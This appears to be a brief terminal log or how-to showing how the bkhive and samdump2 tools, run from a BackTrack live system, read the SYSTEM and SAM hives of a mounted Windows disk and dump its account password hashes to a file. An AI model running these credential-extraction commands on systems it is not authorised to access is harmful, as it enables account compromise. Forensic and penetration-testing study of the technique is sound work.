Extract Windows Password Hashes from a Backtrack Live distrib.


root@root:/home/root/Desktop# bkhive /mnt/hd2/Windows/System32/config/SYSTEM saved-syskey.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : CsiTool-CreateHive-{00000000-0000-0000-0000-000000000000}
Default ControlSet: 001
Bootkey: ###########



root@root:/home/root/Desktop# samdump2 /mnt/hd2/Windows/System32/config/SAM saved-syskey.txt > passwordHashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : CsiTool-CreateHive-{00000000-0000-0000-0000-000000000000}



root@root:/home/root/Desktop